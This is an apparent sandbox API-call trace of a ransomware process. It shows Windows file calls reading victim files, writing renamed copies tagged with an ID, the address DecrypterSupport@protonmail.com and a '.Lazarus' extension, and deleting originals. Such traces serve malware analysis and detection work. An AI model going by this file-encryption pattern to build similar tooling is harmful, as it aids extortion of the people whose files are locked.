[0066.110] SetLastError (dwErrCode=0x0) [0066.110] GetLastError () returned 0x0 [0066.110] SetLastError (dwErrCode=0x0) [0066.110] GetLastError () returned 0x0 [0066.110] SetLastError (dwErrCode=0x0) [0066.110] GetLastError () returned 0x0 [0066.110] SetLastError (dwErrCode=0x0) [0066.110] ReadFile (in: hFile=0x420, lpBuffer=0x8d648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.110] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.111] GetLastError () returned 0x0 [0066.111] SetLastError (dwErrCode=0x0) [0066.111] GetLastError () returned 0x0 [0066.111] SetLastError (dwErrCode=0x0) [0066.111] GetLastError () returned 0x0 [0066.111] SetLastError (dwErrCode=0x0) [0066.111] GetLastError () returned 0x0 [0066.111] SetLastError (dwErrCode=0x0) [0066.111] ReadFile (in: hFile=0x420, lpBuffer=0x8d648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.111] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.111] GetLastError () returned 0x0 [0066.112] SetLastError (dwErrCode=0x0) [0066.112] GetLastError () returned 0x0 [0066.112] SetLastError (dwErrCode=0x0) [0066.112] GetLastError () returned 0x0 [0066.112] SetLastError (dwErrCode=0x0) [0066.112] GetLastError () returned 0x0 [0066.112] SetLastError (dwErrCode=0x0) [0066.112] ReadFile (in: hFile=0x420, lpBuffer=0x8d648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesRead=0x327f0c4*=0xdb0, lpOverlapped=0x0) returned 1 [0066.112] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.112] GetLastError () returned 0x0 [0066.112] SetLastError (dwErrCode=0x0) [0066.112] GetLastError () returned 0x0 [0066.112] SetLastError (dwErrCode=0x0) [0066.113] GetLastError () returned 0x0 [0066.113] SetLastError (dwErrCode=0x0) [0066.113] ReadFile (in: hFile=0x420, lpBuffer=0x8d648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0066.113] GetLastError () returned 0x0 [0066.113] SetLastError (dwErrCode=0x0) [0066.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0066.113] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0xdb0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327ef70*=0xdb0, lpOverlapped=0x0) returned 1 [0066.113] GetLastError () returned 0x0 [0066.113] SetLastError (dwErrCode=0x0) [0066.113] GetLastError () returned 0x0 [0066.113] SetLastError (dwErrCode=0x0) [0066.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0066.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0066.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0066.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0066.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0066.114] CloseHandle (hObject=0x428) returned 1 [0066.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d648 | out: hHeap=0x20000) returned 1 [0066.116] CloseHandle (hObject=0x420) returned 1 [0066.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0066.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0066.116] AreFileApisANSI () returned 1 [0066.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0066.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71b68 [0066.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x71b68, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 45 [0066.116] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0066.118] GetFileType (hFile=0x420) returned 0x1 [0066.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0066.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0066.118] GetLastError () returned 0xb7 [0066.118] SetLastError (dwErrCode=0xb7) [0066.118] WriteFile (in: hFile=0x420, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0066.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0066.119] CloseHandle (hObject=0x420) returned 1 [0066.119] AreFileApisANSI () returned 1 [0066.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0066.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x715b8 [0066.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 45 [0066.119] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml")) returned 1 [0066.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0066.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0066.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0066.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0066.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0066.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0066.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0066.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0066.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5a0 | out: hHeap=0x20000) returned 1 [0066.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6d8 | out: hHeap=0x20000) returned 1 [0066.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0066.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b568 | out: hHeap=0x20000) returned 1 [0066.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0066.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0066.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0066.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0066.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0066.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0066.121] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.121] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.121] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x1, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0066.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0066.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0066.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0066.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0066.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0066.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0066.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0066.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0066.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0066.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0066.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0066.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0066.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0066.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0066.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0066.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0066.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0066.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0066.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0066.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0066.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0066.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0066.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0066.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0066.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0066.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0066.122] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.122] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.122] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.122] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0066.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0066.122] AreFileApisANSI () returned 1 [0066.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1033\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1033\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0066.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0066.122] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.122] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0066.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0066.122] AreFileApisANSI () returned 1 [0066.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0066.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x716f0 [0066.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x716f0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 46 [0066.122] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0066.122] GetFileType (hFile=0x420) returned 0x1 [0066.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0066.123] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0066.123] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0066.123] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0066.123] CloseHandle (hObject=0x420) returned 1 [0066.123] AreFileApisANSI () returned 1 [0066.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0066.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71a30 [0066.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 46 [0066.123] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0066.123] GetFileType (hFile=0x420) returned 0x1 [0066.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0066.124] CloseHandle (hObject=0x420) returned 1 [0066.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0066.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0066.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0066.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0066.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0066.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0066.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0066.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0066.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0066.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0066.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0066.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0066.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0066.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0066.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0066.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0066.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0066.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0066.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0066.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0066.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0066.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0066.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0066.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0066.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0066.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0066.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0066.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0066.125] AreFileApisANSI () returned 1 [0066.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0066.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71a98 [0066.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x71a98, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 46 [0066.125] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1033\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358)) returned 1 [0066.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0066.125] AreFileApisANSI () returned 1 [0066.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0066.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0066.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0066.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0066.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0066.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0066.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0066.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0066.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0066.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0066.125] GetLastError () returned 0x0 [0066.125] SetLastError (dwErrCode=0x0) [0066.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e3e8 [0066.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8c430 [0066.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bd10 [0066.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6c0 [0066.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5b8 [0066.125] GetLastError () returned 0x0 [0066.125] SetLastError (dwErrCode=0x0) [0066.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0066.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0066.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71960 [0066.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0066.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0066.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0066.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0066.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0066.126] AreFileApisANSI () returned 1 [0066.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 108 [0066.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd8) returned 0x51398 [0066.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=108 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 108 [0066.126] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0066.126] GetFileType (hFile=0x420) returned 0x1 [0066.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0066.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0066.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0066.126] AreFileApisANSI () returned 1 [0066.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0066.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71ca0 [0066.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 46 [0066.127] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.127] GetFileType (hFile=0x428) returned 0x1 [0066.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0066.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 